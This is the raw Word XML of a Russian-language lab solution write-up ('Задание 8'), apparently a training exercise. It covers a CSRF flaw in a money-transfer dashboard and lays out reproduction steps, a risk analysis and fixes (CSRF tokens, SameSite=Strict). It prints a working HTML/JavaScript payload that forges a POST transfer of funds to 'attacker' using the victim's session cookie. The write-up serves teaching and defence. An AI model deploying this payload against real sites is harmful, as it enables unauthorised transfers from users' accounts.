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32D9F" w14:textId="7200D90D" w:rsidR="004130A1" w:rsidRDefault="004130A1" w:rsidP="004130A1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Задание 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F5642" w14:textId="6E142EF2" w:rsidR="004130A1" w:rsidRDefault="004130A1" w:rsidP="004130A1">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:t>Разбор решения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F783D" w14:textId="77777777" w:rsidR="004130A1" w:rsidRDefault="004130A1" w:rsidP="004130A1">
      <w:r w:rsidRPr="00B55DE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t xml:space="preserve"> уязвимого ресурса: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007C7CA8">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36102/dashboard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004130A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Тип уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00B55DE4">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="004130A1">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286BB16" w14:textId="2E0752AC" w:rsidR="004130A1" w:rsidRDefault="004130A1" w:rsidP="004130A1">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="004130A1">
        <w:t>Скриншот №1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="007C1B61" w:rsidRPr="007C1B61">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FB68D3" wp14:editId="13A1F843">
            <wp:extent cx="4763377" cy="3193576"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="652713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13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7725" cy="32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5DE4">
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004130A1">
        <w:t>Шаги воспроизведения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A489145" w14:textId="77777777" w:rsidR="0038224D" w:rsidRDefault="004130A1" w:rsidP="004130A1">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На странице </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007C7CA8">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36102/dashboard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> отправляем тестовый перевод, чтобы узнать какие параметры и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> используются</w:t>
      </w:r>
      <w:r w:rsidR="0038224D">
        <w:t xml:space="preserve"> при переводе средств.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28262A25" w14:textId="77777777" w:rsidR="0038224D" w:rsidRDefault="0038224D" w:rsidP="0038224D">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r w:rsidRPr="0038224D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67FD9D4E" wp14:editId="26737CBE">
            <wp:extent cx="4135120" cy="2679099"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1099673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73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8341" cy="270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3871" w14:textId="77777777" w:rsidR="0038224D" w:rsidRDefault="0038224D" w:rsidP="0038224D">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r w:rsidRPr="0038224D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6455D64E" wp14:editId="1A44A4C2">
            <wp:extent cx="4135272" cy="515859"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1746693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93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7456" cy="52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1CA2" w14:textId="77777777" w:rsidR="0038224D" w:rsidRPr="0038224D" w:rsidRDefault="0038224D" w:rsidP="0038224D">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Переходим на сайт эксплойтов и отправляем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0038224D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25A805AC" wp14:editId="2700A332">
            <wp:extent cx="4141541" cy="1862919"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="897587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87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7347" cy="187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3270" w14:textId="77777777" w:rsidR="0038224D" w:rsidRPr="007C1B61" w:rsidRDefault="0038224D" w:rsidP="0038224D">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перевод выполнен. По заголовкам запроса видим, что токен авторизации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E509B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038224D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>заполнился браузером автоматически</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42932853" w14:textId="71BC16AB" w:rsidR="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D095D1" w14:textId="2800D3D6" w:rsidR="004130A1" w:rsidRDefault="0038224D" w:rsidP="0038224D">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038224D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67ACC9D4" wp14:editId="0C836686">
            <wp:extent cx="4012442" cy="3398244"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1275869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694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2793" cy="342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28EA" w14:textId="685D6C76" w:rsidR="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. HTML-Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A19EC3E" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F88EF32" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">'http://62.173.140.174:36102/transfer', { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D47DA" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        method: 'POST', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA453E" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        headers: { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF4D90" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            'Content-type': 'application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF78AF" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F25B6A6" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        body: 'to=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker&amp;amount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=99' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCFFC9" w14:textId="77777777" w:rsidR="007C1B61" w:rsidRPr="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(resp =&gt; console.log(resp))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C991902" w14:textId="7D4D70B2" w:rsidR="007C1B61" w:rsidRDefault="007C1B61" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1B61">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41E3A4" w14:textId="7A5CC6DD" w:rsidR="00BE3D00" w:rsidRDefault="00BE3D00" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E76A7DE" w14:textId="62669331" w:rsidR="00BE3D00" w:rsidRDefault="00BE3D00" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Подтверждающие скриншоты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095AD8D5" w14:textId="7D3D0E29" w:rsidR="009903A5" w:rsidRDefault="00BE3D00" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE3D00">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488171BD" wp14:editId="3CCA18B3">
            <wp:extent cx="5940425" cy="2709545"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1628988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88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3A5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009903A5" w:rsidRPr="009903A5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1EDEC6" wp14:editId="41313B10">
            <wp:extent cx="5940425" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
            <wp:docPr id="1137852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522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F252" w14:textId="77777777" w:rsidR="009903A5" w:rsidRDefault="009903A5" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>5. Разбор риска</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009903A5">
        <w:t xml:space="preserve">Данная уязвимость является CSRF, так как позволяет выполнить запрос от имени авторизованного пользователя со стороннего сайта. Браузер автоматически отправляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009903A5">
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009903A5">
        <w:t xml:space="preserve"> сессии, а сервер не проверяет источник запроса (отсутствует CSRF-токен), что позволяет выполнить перевод средств без участия пользователя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и другие функции, предусмотренные сайтом. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5C7C1D" w14:textId="77777777" w:rsidR="00C34348" w:rsidRDefault="009903A5" w:rsidP="007C1B61">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="009903A5">
        <w:t>Как исправить</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862DC61" w14:textId="77777777" w:rsidR="005E509B" w:rsidRDefault="00C34348" w:rsidP="005E509B">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Д</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34348">
        <w:t>обав</w:t>
      </w:r>
      <w:r>
        <w:t>ить</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34348">
        <w:t xml:space="preserve"> уникальный CSRF-токен в каждую форму и проверят</w:t>
      </w:r>
      <w:r>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34348">
        <w:t xml:space="preserve"> его на сервере при выполнении чувствительных операций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212832A8" w14:textId="49F06CD2" w:rsidR="009903A5" w:rsidRPr="00C34348" w:rsidRDefault="005E509B" w:rsidP="005E509B">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Установить атрибут </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E509B">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Strict</w:t>
      </w:r>
      <w:r w:rsidRPr="005E509B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для предотвращения отправки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="005E509B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с других сайтов</w:t>
      </w:r>
      <w:r w:rsidR="009903A5">
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009903A5" w:rsidRPr="00C343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31111"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97120E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0E39A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A74DF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091CAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AD227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472779">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1762680092">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="298531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0A1"/>
    <w:rsid w:val="0038224D"/>
    <w:rsid w:val="004130A1"/>
    <w:rsid w:val="005E509B"/>
    <w:rsid w:val="006033CC"/>
    <w:rsid w:val="007C1B61"/>
    <w:rsid w:val="009903A5"/>
    <w:rsid w:val="00BE3D00"/>
    <w:rsid w:val="00C3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5476E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E6513498-1655-4356-8335-844F91467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3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3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30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3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30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3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3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3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3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30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30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30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30A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30A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30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30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30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30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3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3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3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3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3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30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30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30A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3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30A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30A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130A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130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://62.173.140.174:36102/dashboard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://62.173.140.174:36102/dashboard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Микрюков</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Данила Микрюков</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-26T08:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-26T10:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>